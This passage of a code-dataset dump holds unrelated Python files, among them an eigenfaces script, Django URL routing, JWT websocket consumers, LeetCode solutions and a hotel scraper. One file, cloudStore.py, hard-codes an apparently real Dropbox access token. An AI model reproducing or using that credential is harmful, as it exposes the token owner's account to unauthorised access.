plt\nfrom pandas.plotting import register_matplotlib_converters \nregister_matplotlib_converters()\n\nclass Analyze:\n default_date = dt.date.isoformat(dt.date.today() - dt.timedelta(397))\n \n def get_data(symbol, date=default_date):\n data = pdr.get_data_yahoo(symbol, start=date)\n return data\n \n def moving_average(df, fast=5, slow=20):\n df[str(fast)+'_day'] = df.Close.rolling(fast).mean()\n df[str(slow)+'_day'] = df.Close.rolling(slow).mean()\n \n \n def plot_MA(df):\n df['tradeSingal']=np.where(df['5_day'] > df['20_day'], 'Buy', 'Sell')\n plt.plot(df['Close'])\n plt.plot(df.filter(regex='day'))\n plt.grid(True)","sub_path":"class_final_project.py","file_name":"class_final_project.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"508663367","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 23 18:00:48 2019\n\n@author: amitabh.gunjan\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 17 16:44:45 2019\n\n@author: amitabh.gunjan\n\"\"\"\n\n\"\"\"\nCreating eigenfaces for dogs' images.\n create one data matrix and repesent an image as a row vector \n in the whola data matrix.\n\"\"\"\nfrom PIL import Image\nimport glob\n\nimage_list = []\ndata_path = 'D:/other/Programming/python/signal-processing/eigenfaces/data/humans/faces94/faces94/male/9416994/*.jpg'\nfor filename in glob.glob(data_path):\n im=Image.open(filename)\n image_list.append(im)\n\nimage_list_resized = [im.resize((180,180), Image.ANTIALIAS) for im in image_list]\nimport numpy as np\nfirst_image = image_list_resized[0]\n\n\"\"\"\nconvert to greyscale and flatten the images.\n\"\"\"\nfirst_greyscale = first_image.convert('L')\ndata_matrix = np.array([list(_image.convert('L').getdata()) for _image in image_list_resized]) # Does work like a charm. Use .getdata() for extracting pixel vals.\n\n\n\"\"\"\nComputing the mean image and removing the mean image from the list of images.\n\"\"\"\nmean_image = data_matrix.mean(0)\nmean_image_reshape = mean_image.reshape(180, 180)\nmean_doggo = Image.fromarray(np.uint8(mean_image_reshape), 'L')\nmean_doggo.show()\n\ndef remove_mean_image( x ):\n return x - (sum(x)/len(x))\n\ndifference_doggos = np.apply_along_axis(remove_mean_image, axis=0, arr=data_matrix )\n\ndef normalize_images(x):\n x = ((255/(x.max() - x.min()))*(x - x.max())) + 255\n return x\n\n\nnormalized_difference_doggos = np.apply_along_axis(normalize_images, axis=0, arr=difference_doggos)\n\nlist_diff_images = [Image.fromarray(np.uint8(x.reshape(180, 180)), 'L') for x in normalized_difference_doggos]\n\n#for i in list_diff_images:\n# i.show()\n \n#cov_matrix = np.cov(difference_doggos)\ncov_matrix = np.matmul(difference_doggos, difference_doggos.T)\nfrom numpy import linalg as LA\nevals, eigenvec = LA.eig(cov_matrix)\neigen_dogs_vectors = np.negative(eigenvec)\n\n\n\n\"\"\"\nGet the eigenvectors of A^T*A and reshape the evectors to create the ghost images of the doggos.\n\"\"\"\neigen_dogs_vectors_transformed = [np.transpose(difference_doggos).dot(e_doggo) for e_doggo in eigen_dogs_vectors]\neigen_dogs_vec_reshaped = [e_doggo.reshape(180, 180) for e_doggo in eigen_dogs_vectors_transformed]\n\n\"\"\"\nScale the eigenvectors back to the original scale to reproduce the images using the belwo formula\n newvalue= (max'-min')/(max-min)*(value-max)+max'\n\"\"\"\nrescaled_evectors = [((255/(_dogs.max() - _dogs.min()))*(_dogs - _dogs.max())) + 255 for _dogs in eigen_dogs_vec_reshaped]\ndogs_face_space = [Image.fromarray(np.uint8(_dogs), 'L') for _dogs in rescaled_evectors]\n\n#for i in dogs_face_space:\n# i.show()\ndef project_image_to_face_space(input_image_path, face_space):\n im=Image.open(input_image_path)\n im = im.resize((180,180), Image.ANTIALIAS)\n \n im.convert('L').show()\n image_vector = np.array(list(im.convert('L').getdata()))\n \"\"\"\n Subtract mean image from the doggo.\n \"\"\"\n# image_vector = image_vector - mean_image\n image_vector = image_vector.reshape(1, 32400)\n \n coefficients = np.dot(image_vector, face_space)\n print(coefficients)\n '''\n Instead of dot product just add the vectors after multiplying the respective coefficients. As provided on this website.\n https://jeremykun.com/2011/07/27/eigenfaces/\n \n '''\n reconstructed_image = np.dot(image_vector, face_space).dot(face_space.T)\n\n \"\"\"\n Add mean doggo to the reconstructed doggo.\n \"\"\"\n# reconstructed_image = np.add(reconstructed_image, mean_image.reshape(1, 32400))\n reconstructed_image_reshaped = reconstructed_image.reshape(180, 180)\n rescaled_image = ((255/(reconstructed_image_reshaped.max() - reconstructed_image_reshaped.min()))*(reconstructed_image_reshaped - reconstructed_image_reshaped.max())) + 255\n reconstructed_doggo = Image.fromarray(np.uint8(rescaled_image), 'L')\n reconstructed_doggo.show()\n return reconstructed_doggo\n\ninput_image_path = 'D:/other/Programming/python/signal-processing/eigenfaces/data/humans/faces94/faces94/male/9416994/9416994.11.jpg'\neigen_dogs_vectors_transformed_matrix = np.matrix(eigen_dogs_vectors_transformed)\neigen_dogs_vectors_transformed_matrix_t = eigen_dogs_vectors_transformed_matrix.T\nreconstructed_doggo = project_image_to_face_space(input_image_path=input_image_path, face_space=eigen_dogs_vectors_transformed_matrix_t)\n\n\nreconstructed_doggos = np.dot(np.dot(normalized_difference_doggos, eigen_dogs_vectors_transformed_matrix_t), eigen_dogs_vectors_transformed_matrix)\n\n\n\"\"\"\nGet the images reconstructed back.\n\"\"\"\nreconstructed_doggos_rescaled = [((255/(_dogs.max() - _dogs.min()))*(_dogs - _dogs.max())) + 255 for _dogs in reconstructed_doggos]\nreconstructed_images_reshaped = [e_doggo.reshape(180, 180) for e_doggo in reconstructed_doggos_rescaled]\nreconstructed_images = [Image.fromarray(np.uint8(_dogs), 'L') for _dogs in reconstructed_images_reshaped]\n#for i in reconstructed_images:\n# i.show() # Images are not exactly the same but quite alike.","sub_path":"eigenfaces/code/scratch/eigen_humans.py","file_name":"eigen_humans.py","file_ext":"py","file_size_in_byte":5051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"452711863","text":"import argparse\nimport xnmt.input_readers as input_readers\n\nfrom xnmt.graph import HyperNode, HyperEdge, HyperGraph\nfrom xnmt.sent import SyntaxTreeNode\nfrom collections import defaultdict\n\nDELIMITER = \"▁\"\n\n# Command Line Arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"conll_tree_input\")\nparser.add_argument(\"sp_input\")\nargs = parser.parse_args()\n\nclass DummyVocab:\n def __init__(self):\n self.vocab = defaultdict(lambda: len(self.vocab))\n self.backvocab = {}\n \n def convert(self, word):\n wordid = self.vocab[word]\n self.backvocab[wordid] = word\n return wordid\n \n def __getitem__(self, item):\n return self.backvocab[item]\n \n# Initialization\nsurface_vocab = DummyVocab()\nnt_vocab = DummyVocab()\nedge_vocab = DummyVocab()\nreader = input_readers.CoNLLToRNNGActionsReader(surface_vocab=surface_vocab,\n nt_vocab=nt_vocab,\n edg_vocab=edge_vocab)\n\ndef graph_to_conll(graph):\n ret = []\n for node in graph.iter_nodes():\n # 1\tcan\t_\tMD\t_\t3\taux\n pred = graph.predecessors(node.node_id, True)\n if len(pred) == 0:\n ret.append(\"{}\\t{}\\t_\\t{}\\t_\\t{}\\t{}\".format(node.node_id, node.value, node.head, 0, \"ROOT\"))\n else:\n pred_id, pred_edge = pred[0]\n ret.append(\"{}\\t{}\\t_\\t{}\\t_\\t{}\\t{}\".format(node.node_id, node.value, node.head, pred_id, pred_edge.label))\n return \"\\n\".join(ret)\n \ndef remap_id(node_list, edge_list, leaves):\n id_mapping = {}\n for i, node in enumerate(leaves):\n id_mapping[node.node_id] = i+1\n # New edge + node with new id mapping\n out_node_list = {}\n out_edge_list = []\n for node_id, node in node_list.items():\n out_node_list[id_mapping[node_id]] = SyntaxTreeNode(id_mapping[node_id], node.value, node.head, node.node_type)\n for edge in edge_list:\n out_edge_list.append(HyperEdge(id_mapping[edge.node_from],\n [id_mapping[edge.node_to[0]]],\n edge.features,\n edge.label))\n return HyperGraph(out_edge_list, out_node_list)\n\ndef normalize_space_at_conll(tree):\n graph = tree.graph\n leaves = []\n node_list = {}\n edge_list = []\n now_id = graph.len_nodes\n for edge in graph.iter_edges():\n edge_list.append(edge)\n edge_list = edge_list[:-1]\n for i in range(1, graph.len_nodes):\n node = graph[i]\n word = node.value\n for j, subword in enumerate(word.split()):\n if j == 0:\n node_list[node.node_id] = SyntaxTreeNode(node.node_id, subword, node.head, node.node_type)\n leaves.append(node_list[node.node_id])\n else:\n node_list[now_id] = SyntaxTreeNode(now_id, subword, node.head, node.node_type)\n leaves.append(node_list[now_id])\n edge_list.append(HyperEdge(node.node_id, [now_id], None, \"[whtsp]\"))\n now_id += 1\n return remap_id(node_list, edge_list, leaves)\n\n# Processing\ndef normalize_sentpiece(sp, graph):\n node_list = {}\n edge_list = []\n leaves = []\n sp = sp.strip().split() + [DELIMITER]\n # Create new hyperedge list\n for edge in graph.iter_edges():\n edge_list.append(edge)\n # Routine to modift the graph structure\n def write_changes(buffer, idx, now_id):\n now_node = graph[idx]\n node_list[idx] = SyntaxTreeNode(now_node.node_id, buffer[0], now_node.head, now_node.node_type)\n leaves.append(node_list[idx])\n for i in range(1, len(buffer)):\n node_list[now_id] = SyntaxTreeNode(now_id, buffer[i], \"[\"+ now_node.head + \"]\", now_node.node_type)\n edge_list.append(HyperEdge(idx, [now_id], edge.features, \"[sp]\"))\n leaves.append(node_list[now_id])\n now_id += 1\n return now_id\n # Synchronously modify the sentpiece and tree\n idx = 0\n buffer = []\n now_id = graph.len_nodes + 1\n for token in sp:\n if DELIMITER in token:\n if idx != 0:\n now_id = write_changes(buffer, idx, now_id)\n buffer.clear()\n idx += 1\n buffer.append(token)\n return remap_id(node_list, edge_list, leaves)\n\ninput_tree = reader.read_sents(args.conll_tree_input)\nwith open(args.sp_input) as input_sp:\n for sp, tree in zip(input_sp, input_tree):\n print(graph_to_conll(normalize_sentpiece(sp, normalize_space_at_conll(tree))))\n print()\n\n","sub_path":"script/parse/sync_conll_and_sp.py","file_name":"sync_conll_and_sp.py","file_ext":"py","file_size_in_byte":4240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"633980182","text":"# -*- coding: UTF-8 -*-\nimport operator\nimport random\n\nimport jieba\nimport os\n\n\ndef TextProcessing(folder_path,test_size = 0.2):\n folder_list = os.listdir(folder_path)\n data_list = []\n class_list = []\n\n for folder in folder_list:\n new_folder_path = os.path.join(folder_path, folder)\n files = os.listdir(new_folder_path)\n for file in files:\n with open(os.path.join(new_folder_path,file) ,'r',encoding='utf-8') as f:\n raw = f.read()\n word_cut = jieba.cut(raw , cut_all= False)\n word_list = list(word_cut)\n\n data_list.append(word_list)\n class_list.append(folder)\n\n data_class_list = list(zip(data_list,class_list))\n random.shuffle(data_class_list)\n index = int(len(data_class_list) * test_size) + 1\n train_list = data_class_list[index :]\n test_list = data_class_list[:index]\n train_data_list , train_class_list = zip(*train_list)\n test_data_list , test_class_list = zip(*test_list)\n\n all_words_dict ={}\n for word_list in train_data_list:\n for word in word_list:\n if word in all_words_dict.keys():\n all_words_dict[word] += 1\n else:\n all_words_dict[word] = 1\n\n all_words_tuple_list = sorted(all_words_dict.items(),key=operator.itemgetter(1),reverse= True)\n # all_words_tuple_list = sorted(all_words_dict,lambda f:f[1],reverse= True)\n all_words_list, all_words_nums = zip(*all_words_tuple_list)\n print()\n\nif __name__ == '__main__':\n folder_path = './SogouC/Sample' # 训练集存放地址\n TextProcessing(folder_path)","sub_path":"com/fp/myBayes/nbc.py","file_name":"nbc.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"411320299","text":"from .tower_scene import TowerScene\nfrom .table_env import TableEnv\nfrom .table_cam_env import TableCamEnv\n\nimport numpy as np\n\nclass TowerEnv(TableEnv):\n \"\"\" Tower environment, trajectory observation, linear tool control \"\"\"\n\n def __init__(self, **kwargs):\n scene = TowerScene(**kwargs)\n super(TowerEnv, self).__init__(scene)\n\n self.observation_space = self._make_dict_space(\n 'distance_to_target',\n 'target_position',\n 'linear_velocity',\n 'grip_forces',\n 'grip_width'\n )\n self.action_space = self._make_dict_space(\n 'linear_velocity',\n # 'joint_velocity',\n 'grip_velocity'\n )\n\n def _get_observation(self, scene):\n return dict(\n tool_position=scene.robot.arm.tool.state.position[0],\n cubes_position=scene.cubes_position,\n distance_to_cubes =scene.distance_to_cubes,\n linear_velocity=scene.robot.arm.tool.state.velocity[0],\n grip_state=scene.robot.gripper.controller.state,)\n\n\nclass TowerCamEnv(TableCamEnv):\n \"\"\" Tower environment, camera observation, linear tool control \"\"\"\n\n def __init__(self, view_rand, gui_resolution, cam_resolution, num_cameras, **kwargs):\n scene = TowerScene(**kwargs)\n super(TowerCamEnv, self).__init__(scene, view_rand, gui_resolution, cam_resolution, num_cameras)\n\n self.action_space = self._make_dict_space(\n 'linear_velocity',\n # 'joint_velocity',\n 'grip_velocity'\n )\n","sub_path":"mime/envs/table_envs/tower_env.py","file_name":"tower_env.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"129766312","text":"\"\"\"xsede_warehouse URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf.urls import include, url\nfrom django.conf import settings\nfrom django.contrib.auth import views\nfrom django.http import HttpResponse\nfrom . import views\n#from django.views.generic.simple import direct_to_template\nfrom django.views.generic import TemplateView, RedirectView\nfrom rest_framework_swagger.views import get_swagger_view\nfrom xsede_warehouse.settings import API_BASE\n\nurlpatterns_public = [\n url(r'^$', TemplateView.as_view(template_name='index.html')),\n url(r'^allocations/v1/', include('allocations.urls')),\n url(r'^glue2-db-api/v1/', include('glue2_db_api.urls')),\n url(r'^glue2-provider-api/v1/', include('glue2_provider.urls')),\n url(r'^glue2-views-api/v1/', include('glue2_views_api.urls')),\n url(r'^goendpoint-api/v1/', include('goendpoint_api.urls')),\n url(r'^monitoring-db-api/v1/', include('monitoring_db_api.urls')),\n url(r'^monitoring-provider-api/v1/', include('monitoring_provider.urls')),\n url(r'^monitoring-views-api/v1/', include('monitoring_views_api.urls')),\n url(r'^outages/v1/', include('outages.urls')),\n url(r'^processing-status/', include('processing_status.urls')),\n url(r'^projectresources/v1/', include('projectresources.urls')),\n url(r'^rdr-db/', include('rdr_db.urls')),\n url(r'^resource-api/v1/', include('resource_cat.urls')),\n url(r'^resource-api/v2/', include('resource_v2.urls')),\n url(r'^resource-api/v3/', include('resource_v3.urls')),\n url(r'^resource-status-api/v1/', include('resource_status_api.urls')),\n url(r'^speedpage/v1/', include('speedpage.urls')),\n url(r'^xcsr-db/v1/', include('xcsr_db.urls')),\n url(r'^xdcdb/v1/', include('xdcdb.urls')),\n url(r'^xdinfo/v1/', include('xdinfo.urls')),\n url(r'^warehouse-views/', include('warehouse_views.urls')),\n url(r'^home/', views.home, name='home'),\n url(r'^', include('django.contrib.auth.urls')),\n url(r'^', include('social_django.urls', namespace='social'))\n]\n\nschema_view = get_swagger_view(title='XSEDE Warehouse API', url=API_BASE, patterns=urlpatterns_public)\n\nurlpatterns_internal = [\n url(r'^admin/', admin.site.urls),\n url(r'^api-docs/', schema_view, name='swagger'),\n url(r'^debug/', include('debug.urls')),\n url(r'^favicon\\.ico$', lambda x: HttpResponse(\"User-Agent: *\\nDisallow:\", content_type=\"image/ico\"), name=\"/static/favicon.ico\"),\n url(r'^robots\\.txt$', lambda x: HttpResponse(\"User-Agent: *\\nDisallow:\", content_type=\"text/plain\"), name=\"/static/robots.txt\"),\n url(r'^$', TemplateView.as_view(template_name='index.html')),\n url(r'^info/feedback(\\.html|\\/)?$',TemplateView.as_view(template_name='feedback.html')),\n url(r'^resource-api/v3/', include('resource_v3.urls_internal')),\n]\n\nurlpatterns = urlpatterns_internal + urlpatterns_public\n","sub_path":"django_xsede_warehouse/xsede_warehouse/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"458711124","text":"# -*- coding: utf-8 -*-\nimport cgi\nimport collections\nfrom urllib.parse import parse_qsl\nfrom watson.common.contextmanagers import ignored\nfrom watson.common.datastructures import MultiDict\n\n\n__all__ = ['get_form_vars']\n\n\ndef get_form_vars(environ):\n \"\"\"Convert environ vars into GET/POST/FILES objects.\n\n Process all get and post vars from a
and return MultiDict of\n each.\n \"\"\"\n if environ['REQUEST_METHOD'] == 'PUT' and not environ.get('CONTENT_TYPE'):\n environ['CONTENT_TYPE'] = 'application/x-www-form-urlencoded'\n field_storage = cgi.FieldStorage(fp=environ['wsgi.input'], environ=environ,\n keep_blank_values=True)\n get = MultiDict()\n for name, value in parse_qsl(environ.get('QUERY_STRING'),\n keep_blank_values=True):\n get[name] = value if value else ''\n return _process_field_storage(field_storage, get=get)\n\n\nFile = collections.namedtuple(\n 'File',\n 'data filename name type type_options disposition disposition_options headers')\n\n\ndef _process_field_storage(fields, get=None, post=None, files=None):\n if not get:\n get = MultiDict()\n if not post:\n post = MultiDict()\n if not files:\n files = MultiDict()\n with ignored(Exception):\n for name in fields:\n field = fields[name] if isinstance(name, str) else name\n if isinstance(field, list):\n _process_field_storage(field, get, post, files)\n elif field.filename:\n # An uploaded file, create a new File tuple to resolve the\n # not indexable issue.\n files[field.name] = File(\n field.file,\n field.filename,\n field.name,\n field.type,\n field.type_options,\n field.disposition,\n field.disposition_options,\n field.headers)\n elif field.disposition or field.name not in get:\n post[field.name] = field.value\n else:\n if field.name not in get:\n get[field.name] = field.value\n return get, post, files\n","sub_path":"watson/http/wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"409834647","text":"import dropbox\r\n \r\nclass transferdata:\r\n def __init__(self,accesstoken) :\r\n self.accesstoken=accesstoken\r\n\r\n def uploadfile(self,filefrom,fileto):\r\n dbx=dropbox.Dropbox(self.accesstoken)\r\n with open(filefrom,'rb')as f:\r\n dbx.files_upload(f.read(),fileto)\r\n\r\ndef cloud ():\r\n accesstoken=\"ZhF8ZWT4ak4AAAAAAAAAAXQfNIrPsdaaCDEOkH7KYSnISri1v5GJavIlIlHJ6RrK\" \r\n transferfile=transferdata(accesstoken) \r\n filefrom=input('enter the file name to upload: ') \r\n fileto=input('enter the file name with app name: ')\r\n\r\n transferfile.uploadfile(filefrom,fileto) \r\n print('file uploaded successfully to drop box')\r\n\r\ncloud()\r\n\r\n","sub_path":"cloudStore.py","file_name":"cloudStore.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"28861653","text":"class Solution:\n def mySqrt(self, x):\n \"\"\"\n :type x: int\n :rtype: int\n \"\"\"\n n = 0\n while n * n <= x:\n n = n + 1\n return n - 1\n#####----------time limit\n\nclass Solution2:\n def mySqrt(self, x):\n \"\"\"\n :type x: int\n :rtype: int\n \"\"\"\n if x == 1 or x == 0:\n return x\n begin, end, result, mid = 0, x, 0, 0\n while abs(result - x) > 0.01:\n mid = (begin + end) / 2\n result = mid * mid\n if result > x:\n end = mid\n elif result < x:\n begin = mid\n if x in range(int(mid)* int(mid), (int(mid) + 1) * (int(mid) + 1)):\n return int(mid)\n return int(mid) + 1\n###########----------dichotomy(faster)\n\nclass Solution3:\n def mySqrt(self, x):\n \"\"\"\n :type x: int\n :rtype: int\n \"\"\"\n if x == 0:\n return 0\n pre, cur = 0.01, x\n while abs(cur - pre) > 0.01:\n pre = cur\n cur = (pre/2 + x/(2*pre))\n if x in range(int(cur)* int(cur), (int(cur) + 1) * (int(cur) + 1)):\n return int(cur)\n return int(cur) + 1\n#########-----Newton's method(fastest)\n#https://baike.baidu.com/item/牛顿迭代法/10887580?fr=aladdin\n\n \n\n \n \n","sub_path":"leetcode-first_time/leetcode69(sqrt).py","file_name":"leetcode69(sqrt).py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"409582617","text":"# -*- coding: utf-8 -*-\nimport numpy as np\n\n\nn=int(input('Digite o tamanho da matriz nxn: '))\na=np.zeros( (n,n) )\n\n\nfor i in range(0,n,1):\n for j in range(0,n,1):\n a[i,j]=int(input('elemento: '))\n\nsl=sum(a[i])\nsc=sum(a[j])\nsv=(sum(a[i][i]))\nif sl==sc and sc==sv:\n print('S')\nelse :\n print('N')\n\n \n \n\n","sub_path":"moodledata/vpl_data/445/usersdata/339/103120/submittedfiles/matriz2.py","file_name":"matriz2.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"26980664","text":"import channels\nimport channels.handler\nimport channels.generic.websockets\n\nimport rest_framework_jwt.serializers\nimport jwt.exceptions\n\nimport backend.models\nimport backend.serializers\nimport backend.auth\n\ndef jwt_auth(message):\n \"\"\"\n Attempt to authenticate the user through a JWT provided in\n the 'token' query parameter.\n\n :param message: The channel message object\n :return: The authenticated user, or None\n \"\"\"\n\n # Construct a fake http-like object\n # (See: https://stackoverflow.com/questions/46230340/how-to-authenticate-a-user-in-websocket-connection-in-django-channels-when-using)\n message.content.setdefault('method', 'FAKE')\n request = channels.handler.AsgiRequest(message)\n\n # Validate the token in the request in a slightly hacky way\n try:\n validated = rest_framework_jwt.serializers.VerifyJSONWebTokenSerializer().validate(request.GET)\n\n # If no exception is thrown, the token is valid. Store it in the session if it is a kit.\n return backend.auth.downcast_user_type(validated['user'])\n except (KeyError, jwt.exceptions.InvalidTokenError):\n return None\n\nclass JWTSessionAuthConsumer(channels.generic.websockets.JsonWebsocketConsumer):\n \"\"\"\n A JSON WebSocket consumer that attempts to authenticate\n a kit using JWT through a HTTP query parameter. If successful,\n places the kit name in the channel session parameter 'kit'.\n \"\"\"\n\n #: Use channel sessions, and transfer the HTTP user (from\n #: a Django session) to the channel session\n http_user_and_session = True\n\n def connect(self, message, **kwargs):\n user = jwt_auth(message)\n if isinstance(user, backend.models.Kit):\n self.message.channel_session['kit'] = user.username\n \n super().connect(message, **kwargs)\n\nclass MeasurementSubscribeConsumer(JWTSessionAuthConsumer):\n \"\"\"\n A measurement subscribe consumer. Any user (or kit) can\n subscribe to measurements of kits they own.\n \"\"\"\n def receive(self, content, multiplexer, **kwargs):\n # Subscribe user to kit measurement updates\n if \"kit\" not in content:\n multiplexer.send({\"error\": \"Kit to subscribe to not given.\"})\n return\n\n try:\n kit = backend.models.Kit.objects.get(username=content['kit'])\n if not self.message.user.has_perm('backend.subscribe_to_kit_measurements_websocket', kit):\n multiplexer.send({\"error\": \"Kit not found or you do not have access to it.\"})\n return\n\n channels.Group(\"kit-measurements-%s\" % kit.username).add(multiplexer.reply_channel)\n multiplexer.send({\"action\": \"subscribe\", \"kit\": kit.username})\n except:\n multiplexer.send({\"error\": \"Kit not found or you do not have access to it.\"})\n\nclass MeasurementPublishConsumer(JWTSessionAuthConsumer):\n \"\"\"\n A measurement publish consumer. Any kit can publish measurements.\n The measurements are sent to all clients who are subscribed to\n measurements of that kit.\n \"\"\"\n def receive(self, content, multiplexer, **kwargs):\n # Publish a measurement\n if \"kit\" not in self.message.channel_session:\n multiplexer.send({\"error\": \"You must be a kit to publish measurements.'.\"})\n return\n\n try:\n # Deserialize measurement\n measurement_serializer = backend.serializers.MeasurementSerializer(data=content['measurement'])\n measurement_serializer.is_valid(raise_exception = True)\n\n measurement = backend.models.Measurement(**measurement_serializer.validated_data)\n\n kit = backend.models.Kit.objects.filter(username=self.message.channel_session['kit']).get()\n\n # Get the peripheral device object by its name (if it's associated with this kit)\n peripheral = kit.peripherals.filter(name=content['measurement']['peripheral']).get()\n\n # Add peripheral to the measurement object\n measurement.peripheral = peripheral\n\n # Get the registered measurement type by the physical quantity and physical unit if it exists\n measurement_types_qs = peripheral.peripheral_definition.measurement_types.filter(physical_quantity = measurement.physical_quantity, physical_unit = measurement.physical_unit)\n if measurement_types_qs:\n measurement_type = measurement_types_qs.first()\n measurement.measurement_type = measurement_type\n\n output_serializer = backend.serializers.MeasurementOutputSerializer(measurement)\n multiplexer.send({\"success\": \"published\"})\n self.group_send(\"kit-measurements-%s\" % self.message.channel_session['kit'], output_serializer.data)\n except Exception as exception:\n multiplexer.send({\"error\": \"You must provide a valid measurement.'.\"})\n print(exception)\n","sub_path":"backend/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":4899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"314646142","text":"# task 3\n\ndef main():\n print('Check odd and even numbers in range')\n try:\n begin = int(input('begin: '))\n end = int(input('end: '))\n if begin > end:\n raise Exception('begin > end')\n print('Range {:d} - {:d}'.format(begin, end))\n odd = []\n even = []\n for number in range(begin, end+1):\n if number % 2 > 0:\n odd.append(number)\n else:\n even.append(number)\n print('odd: ', odd)\n print('even: ', even)\n except Exception as e:\n print('Error: ', e)\n finally:\n print('bye!')\n\nif __name__ == '__main__':\n main()","sub_path":"hw1/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"101528925","text":"#this program is only for when w e doct have postman\n\nimport requests\nimport json\n\nURL = \"http://localhost:8000/StudentApi/getStudentModel\"\n\n\ndef get_data(id=None):\n data = {}\n if id is not None:\n data = {'id': id}\n json_data = json.dumps(data)\n r = requests.get(url=URL, data=json_data)\n data = r.json()\n print(data)\n\n# get_data()\n\n\ndef post_data():\n data = {\n 'name': 'disha',\n 'roll': 30,\n 'city': 'surat'\n }\n json_data = json.dumps(data)\n r = requests.post(url=URL, data=json_data)\n data = r.json()\n print(data)\n\n#post_data()\n\n\ndef update_data():\n data = {\n 'id': 24,\n 'name': 'disha',\n 'roll': 31,\n }\n json_data = json.dumps(data)\n r = requests.put(url=URL, data=json_data)\n data = r.json()\n print(data)\n\nupdate_data()\n\n\ndef delete_data():\n data = {'id': 1}\n json_data = json.dumps(data)\n r = requests.delete(url=URL, data=json_data)\n data = r.json()\n print(data)\n\n\n#delete_data()\n","sub_path":"CRUDApi/ThirdPartyRequests.py","file_name":"ThirdPartyRequests.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"439513387","text":"from frequency import geometric\nfrom signal_generator import makeSineSignal, writeSignalWav\nfrom numpy import arange\n\nif __name__ == \"__main__\":\n sampleRate = 44100.0\n x=arange(sampleRate)\n for i in range(0,11,1):\n freq = geometric(i)\n sign = makeSineSignal(freq, sampleRate, x, amplitude = 20000.0)\n writeSignalWav(sign, str(freq) + '.wav')\n\n","sub_path":"core/file_generator.py","file_name":"file_generator.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"450120912","text":"import numpy as np\r\nimport pandas as pd\r\nimport json\r\nimport datetime\r\n\r\nfrom copy import deepcopy\r\nfrom lxml import html, etree\r\nfrom scripts import dotw_config\r\nfrom scripts.core.logs import ParsingLogger\r\nfrom scripts.core.base import ParserBase, ParamParser\r\n\r\n\r\nclass DOTWLogger(ParsingLogger):\r\n NAME = 'dotw_parsing'\r\n\r\n\r\nDOTWLogger.set_logger()\r\nParamParser.DATA_TYPE = 'XPATH'\r\nParserBase.TRL = DOTWLogger\r\nParserBase.CONFIG_FILE = dotw_config\r\n\r\n\r\nclass Hotel(ParserBase):\r\n PROPERTIES = [\r\n ParamParser('address', 'hotel_data_html', ParserBase.CONFIG_FILE.Hotel__address, 'single_obj_array'),\r\n ParamParser('latitude', 'hotel_elem', ParserBase.CONFIG_FILE.Hotel__latitude, 'single_obj_array'),\r\n ParamParser('longitude', 'hotel_elem', ParserBase.CONFIG_FILE.Hotel__longitude, 'single_obj_array'),\r\n ]\r\n\r\n EXTRA_FIELDS = ['hotelName', 'website_id', 'starRating', 'city',\r\n 'index', 'total_hotel', 'page_path', 'supplier', 'city_zone']\r\n\r\n def __init__(self, parser_data):\r\n self.hotel_data_html = html.fromstring(parser_data['htmls']['hotelHTML']['html_element'])\r\n self.hotel_elem = html.fromstring(parser_data['htmls']['hotel_elem'])\r\n super().__init__(parser_data)\r\n\r\n @property\r\n def parsed__starRating(self):\r\n return self.hotel_elem.attrib['data-rate']\r\n\r\n @property\r\n def parsed__hotelName(self):\r\n return self.parser_data['hotelName']\r\n\r\n @property\r\n def parsed__website_id(self):\r\n return self.parser_data['hotel_id']\r\n\r\n @property\r\n def parsed__city(self):\r\n return self.parser_data['city']\r\n\r\n @property\r\n def parsed__index(self):\r\n return self.parser_data['index']\r\n\r\n @property\r\n def parsed__total_hotel(self):\r\n return self.parser_data['hotel_count']\r\n\r\n @property\r\n def parsed__pos(self):\r\n return self.parser_data['pos']\r\n\r\n @property\r\n def parsed__page_path(self):\r\n return 